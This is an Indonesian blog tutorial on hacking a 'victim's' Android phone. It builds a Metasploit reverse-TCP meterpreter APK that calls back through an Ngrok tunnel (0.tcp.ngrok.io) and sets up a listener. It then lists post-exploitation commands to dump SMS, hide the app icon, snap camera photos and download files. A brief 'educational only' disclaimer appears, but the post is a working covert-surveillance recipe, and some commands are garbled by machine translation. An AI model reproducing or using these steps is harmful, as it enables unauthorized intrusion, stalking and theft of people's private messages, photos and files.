Selasa, 26 Mei 2020

Cara meretas ponsel Android menggunakan Termux dengan Metasploit dan Ngrok-2020

Cara meretas ponsel Android menggunakan Termux dengan Metasploit dan Ngrok-2020


Cara meretas ponsel Android menggunakan Termux dengan Metasploit.

Dalam posting ini, kita akan belajar tentang cara meretas ponsel android menggunakan termux dengan Metasploit. Anda cukup menyalin dan menempelkan perintah satu per satu di aplikasi termux dan itu akan bekerja dengan sempurna.

CATATAN: Posting ini hanya untuk tujuan pendidikan. Saya dan situs ini tidak mendukung kegiatan kriminal. Jika Anda melakukan penyalahgunaan informasi ini, situs ini tidak bertanggung jawab untuk itu. SITUS INI HANYA MENDUKUNG HACKING ETIS.

Persyaratan:
  1. Termux: Jika Anda ingin tahu tentang termux secara Detail [Apa itu termux? Unduh termux pada tahun 2020 ]
  2. Metasploit: Jika Anda tidak memiliki Metasploit di Termux Anda [ Instal Metasploit di termux 2020 ]

Port Forwarding menggunakan Ngrok in termux:

Jika Anda ingin menggunakan Metasploit di LAN maka Anda dapat melewati langkah ini (jika Anda dan korban Anda terhubung ke wifi yang sama maka Anda dapat melewati langkah ini).

Dengan bantuan port forwarding, kita dapat mengakses ponsel korban dengan menggunakan data seluler yang artinya jika Anda menggunakan Simcard maka Anda harus melakukan port forwarding untuk menggunakan Metasploit.

Langkah 1:
Pergi ke Ngrok.com dan buat akun. Jika Anda sudah memiliki akun di negrok kemudian masuk.



Langkah 2:
Unduh file zip Ngrok di ponsel Anda. Ini akan menjadi sekitar 12MB file.


Langkah 3:
Sekarang Anda akan melihat file zip yang telah Anda unduh dari situs web Ngrok.
Buka termux dan arahkan ke file zip itu. Jika tidak ada di folder unduhan Anda atau Anda tidak dapat melihat folder unduhan Anda, cukup buka file manager dan rekatkan file zip di penyimpanan internal Anda. Dan pergi ke termux dan penyimpanan cd.



Langkah 4:
Ketikkan perintah ini untuk menyalin file zip di direktori Home termux Anda.
 cp ngrok-stable-linux-arm.zip / $ HOME


Langkah 5:
Ketikkan perintah ini untuk kembali ke direktori home Anda.
 cd / $ HOME


Langkah 6:
Ketikkan perintah ini untuk unzip file.
 unzip ngrok-stable-linux-arm.zip



Langkah 7:
Buka situs Ngrok lagi dan salin token, (harap salin token lengkap)



Langkah 8:
Buka terminal dan ketik kode ini dan tempel token Anda dan tekan enter.
 ./ngrok authtoken 


Langkah 9:
Ketikkan perintah ini untuk memulai penerusan port pada port 1275.
 ./ngrok tcp 1275
Anda dapat menggunakan nomor port apa pun yang saya gunakan 1275 di sini.



Langkah 10:
Jika Anda juga mendapatkan kesalahan ini, buka saja hotspot Anda dan akan diperbaiki dalam 30 hingga 60 detik.




Buat payload di Metasploit:

Payload akan menjadi file apk yang akan kita instal di ponsel korban. Itu akan memungkinkan kita untuk mengakses ponsel android korban.

Langkah 1:
Buka sesi baru dalam termux (cukup geser layar Anda dari kiri ke kanan dan klik sesi baru ).
pastikan termux memiliki izin penyimpanan.


 termux-setup-storage
Izinkan izin penyimpanan.

Langkah 2:
Ketikkan perintah ini untuk membuat payload dan tekan Enter.

Silakan ubah LHOST dan LPORT Anda seperti yang diberikan pada gambar di bawah ini.

 msfvenom -p android / meterpreter / reverse_tcp LHOST = 0.tcp.ngrok.io LPORT = 15181 R> /data/data/com.termux/files/home/storage/share/Android.apk


 Langkah 3:
Buka penyimpanan internal Anda dan Anda akan melihat Android.apk.
Instal apk ini di telepon korban.



Mulai Pendengar (msfconsole): 

Langkah 1:
Ketik perintah ini di jendela termux untuk memulai msfconsole.
 msfconsole
Diperlukan waktu hingga 30 detik untuk memulai.



Langkah 2:
Ketikkan perintah ini.
 gunakan exploit / multi / handler



Langkah 3:
Ketikkan perintah ini untuk mengatur payload.
 atur payload android / meterpreter / reverse_tcp 


Langkah 4:
Sekarang atur LHOST tempat Anda ingin mendengarkan sesi.
Jika Anda menggunakan penerusan port ngrok maka masukkan alamat IP ini  tetapi jika Anda tidak menggunakan penerusan porta maka masukkan IP Lokal Anda.
 atur LHOST 127.0.0.1



Langkah 5:
Sekarang atur LPORT.
jika Anda menggunakan Ngrok kemudian atur port yang sama dengan yang Anda gunakan saat port forwarding.
jika Anda tidak menggunakan penerusan porta maka masukkan saja porta yang sama dengan yang Anda gunakan untuk membuat payload.
 atur LPORT 1275 


Langkah 6:
Ini adalah perintah terakhir dan telepon akan diretas.
 mengeksploitasi.
Ini akan terhubung ke korban dan memberi Anda sesi meterpreter.



Beberapa perintah yang berguna dalam Meterpreter.

Temukan semua perintah yang tersedia:
perintah ini akan memberi Anda daftar perintah dan deskripsi singkat dari perintah itu.
 Tolong 



Dapatkan SMS dari ponsel korban ke ponsel Anda:
Perintah ini akan memberi Anda 50 SMS terbaru dari telepon korban.
 dump_sms
Anda akan mendapatkan file teks yang berisi semua SMS dengan detail cukup gunakan perintah cat untuk membuka file .



Sembunyikan ikon Apk yang Anda kirim ke korban:
Jika Anda menginstal aplikasi pada ponsel korban maka jelas bahwa korban akan melihat bahwa aplikasi dan kemungkinan korban akan menghapus instalan aplikasi. Dengan menggunakan perintah di bawah ini Anda dapat menyembunyikan ikon aplikasi dari ponsel korban.
 hide_app_icon


Ubah mode audio ponsel korban:
Anda dapat mengatur ponsel pada mode umum dengan menggunakan perintah di bawah ini.
 set_audio_mode -m 1
Anda dapat mengetik set_audio_mode -m 0 untuk mematikan ponsel.


Mengambil foto dari ponsel korban:
Perintah ini akan mengambil foto dari kamera korban dan mengirimkannya ke folder penyimpanan Anda.
 webcam_snap


 Akses penyimpanan file korban:
Anda dapat menavigasi ke file korban dan melihat semua data dalam folder apa pun.
 cd / sdcard
Anda dapat mengetik perintah ls untuk menampilkan direktori jika Anda ingin tahu tentang perintah dasar termux baca posting ini.

Unduh file apa saja dari ponsel korban:
arahkan ke file yang ingin Anda unduh dan ketik perintah ini
 unduh nama file


BACA: Cara Menyembunyikan ikon Aplikasi dari ponsel korban dan Tetap terhubung bahkan Setelah Korban me-restart telepon.




KESIMPULAN:

Jadi sekarang Anda memiliki sesi meterpreter yang berarti Anda memiliki akses ke telepon korban. tetapi jika korban menghapus aplikasi maka Anda tidak dapat mengakses telepon lagi, Jika Anda ingin tahu bagaimana kami dapat mengakses telepon bahkan jika korban menghidupkan kembali telepon kemudian periksa [ Cara Menyembunyikan ikon aplikasi dan membuat muatan yang terus-menerus dalam metasploit ]. Saya tahu ini blog yang sangat panjang jika Anda masih membaca komentar saja nama Anda, saya akan sangat menghargainya.

0 komentar:

Posting Komentar